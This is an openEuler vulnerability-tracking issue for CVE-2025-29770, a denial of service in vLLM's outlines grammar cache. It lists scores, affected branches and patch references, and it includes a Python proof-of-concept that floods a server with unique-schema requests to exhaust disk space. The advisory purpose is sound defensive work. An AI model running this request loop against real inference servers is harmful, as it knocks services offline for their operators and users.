CVE-2025-29770 (Suspended)
#IBUSCC · CVE and security issues
openeuler-ci-bot (owner) opened this issue on 2025-03-20 00:51
I. Vulnerability Information

CVE ID: [CVE-2025-29770](https://nvd.nist.gov/vuln/detail/CVE-2025-29770)
Affected component: [vllm](https://gitee.com/src-openeuler/vllm)
Affected version: 0.6.6.post1
CVSS V3.0 score: BaseScore 6.5 (Medium)
Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Vulnerability summary:
vLLM is a high-throughput and memory-efficient inference and serving engine for LLMs. The outlines library is one of the backends vLLM uses to support structured output (a.k.a. guided decoding). Outlines provides an optional cache for its compiled grammars on the local filesystem, and this cache has been enabled by default in vLLM. Outlines is also available by default through the OpenAI-compatible API server. The affected code in vLLM is vllm/model_executor/guided_decoding/outlines_logits_processors.py, which unconditionally uses the cache from outlines. A malicious user can send a stream of very short decoding requests with unique schemas, adding a new cache entry for each request. This can result in a denial of service if the filesystem runs out of space. Note that even if vLLM is configured to use a different backend by default, outlines can still be chosen on a per-request basis via the guided_decoding_backend key of the request's extra_body field. This issue applies only to the V0 engine and is fixed in 0.8.0.

Disclosure time: 2025-03-20 00:15:31
Vulnerability record created: 2025-03-20 00:51:48
Vulnerability details: https://nvd.nist.gov/vuln/detail/CVE-2025-29770

Additional references:

| Source | Reference link | Source link |
| ------ | -------------- | ----------- |
| security-advisories.github.com | https://github.com/vllm-project/vllm/blob/53be4a863486d02bd96a59c674bbec23eec508f6/vllm/model_executor/guided_decoding/outlines_logits_processors.py | |
| security-advisories.github.com | https://github.com/vllm-project/vllm/pull/14837 | |
| security-advisories.github.com | https://github.com/vllm-project/vllm/security/advisories/GHSA-mgrm-fgjv-mhv8 | |

Vulnerability analysis guide: https://gitee.com/openeuler/cve-manager/blob/master/cve-vulner-manager/doc/md/manual.md
Vulnerability data source: openBrain open-source vulnerability awareness system

Patch information:

| Affected package | Fixed version | Fix patch | Patch that introduced the issue | Source |
| ---------------- | ------------- | --------- | ------------------------------- | ------ |
| | | https://github.com/vllm-project/vllm/pull/14837 | | security-advisories.github.com |

II. Vulnerability Analysis Feedback

Impact analysis:
As described in the vulnerability summary above: the outlines filesystem cache for compiled grammars is used unconditionally in vllm/model_executor/guided_decoding/outlines_logits_processors.py, so a stream of short requests with unique schemas grows the cache until the filesystem runs out of space, causing a denial of service. The outlines backend can also be selected per request through the guided_decoding_backend key of extra_body even when another backend is the server default. Only the V0 engine is affected; the issue is fixed in 0.8.0.

openEuler score: 6.5
Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Affected version check (affected / not affected):
1. openEuler-22.03-LTS-SP4 (0.6.6.post1): affected
2. openEuler-24.03-LTS-Next (0.6.6.post1): affected
3. openEuler-24.03-LTS-SP1 (0.6.6.post1): affected
4. master (0.7.3): not affected
5. openEuler-20.03-LTS-SP4: not affected
6. openEuler-22.03-LTS-SP3: not affected
7. openEuler-24.03-LTS: not affected
8. openEuler-24.03-LTS-SP2: not affected

Does the fix involve an ABI change (yes/no):
1. master (0.7.3): no
2. openEuler-20.03-LTS-SP4: no
3. openEuler-22.03-LTS-SP3: no
4. openEuler-22.03-LTS-SP4 (0.6.6.post1): no
5. openEuler-24.03-LTS: no
6. openEuler-24.03-LTS-Next (0.6.6.post1): no
7. openEuler-24.03-LTS-SP1 (0.6.6.post1): no
8. openEuler-24.03-LTS-SP2: no

Reasons:
1. openEuler-22.03-LTS-SP4 (0.6.6.post1): not fixed for now (no solution or patch available yet)
2. openEuler-24.03-LTS-Next (0.6.6.post1): not fixed for now (no solution or patch available yet)
3. openEuler-24.03-LTS-SP1 (0.6.6.post1): not fixed for now (no solution or patch available yet)
4. openEuler-20.03-LTS-SP4: not affected (component does not exist in this branch)
5. openEuler-22.03-LTS-SP3: not affected (component does not exist in this branch)
6. openEuler-24.03-LTS: not affected (component does not exist in this branch)
7. openEuler-24.03-LTS-SP2: not affected (vulnerable component does not exist in this branch)
8. master (0.7.3): not affected (vulnerable code is not in the execution path)
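To make the cache-growth mechanism concrete, below is a minimal sketch of the request pattern the summary describes, using the openai Python client against a vLLM OpenAI-compatible server. The base URL and model name are placeholders, and the extra_body keys (guided_decoding_backend, guided_json) are assumed to match vLLM's guided-decoding request parameters as referenced in the advisory; treat this as an illustration of the mechanism, not a verified exploit.

```python
"""Sketch of the CVE-2025-29770 cache-growth pattern (assumptions noted inline).

Each request carries a structurally unique JSON schema and selects the outlines
backend per request. On affected V0-engine builds (< 0.8.0), every unique schema
adds a new compiled-grammar entry to the outlines filesystem cache.
"""
from openai import OpenAI  # pip install openai

# Placeholder endpoint and model name; adjust to the server under test.
client = OpenAI(base_url="http://localhost:8000/v1", api_key="EMPTY")
MODEL = "my-model"  # hypothetical served model name


def unique_schema(i: int) -> dict:
    # A trivially unique schema: the property name changes every iteration,
    # so the compiled grammar (and its cache key) differs each time.
    return {
        "type": "object",
        "properties": {f"field_{i}": {"type": "string"}},
        "required": [f"field_{i}"],
    }


for i in range(10):  # an attacker would loop far longer
    client.completions.create(
        model=MODEL,
        prompt="{",      # very short request; the cost is in grammar compilation
        max_tokens=1,
        extra_body={
            # Per-request backend selection described in the advisory: this
            # forces outlines even if another backend is the server default.
            "guided_decoding_backend": "outlines",
            "guided_json": unique_schema(i),
        },
    )
```

Per the advisory, only the V0 engine is affected, and upgrading to 0.8.0 (which carries the fix from https://github.com/vllm-project/vllm/pull/14837) resolves the issue.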
Comments (5)
Status: Suspended
Assignee: jimmy_hero
Labels: CVE/UNFIXED, sig/ai
Projects: Unprojected
Milestones: No related milestones
Pull Requests: None yet
Related branches: None
Participants: 1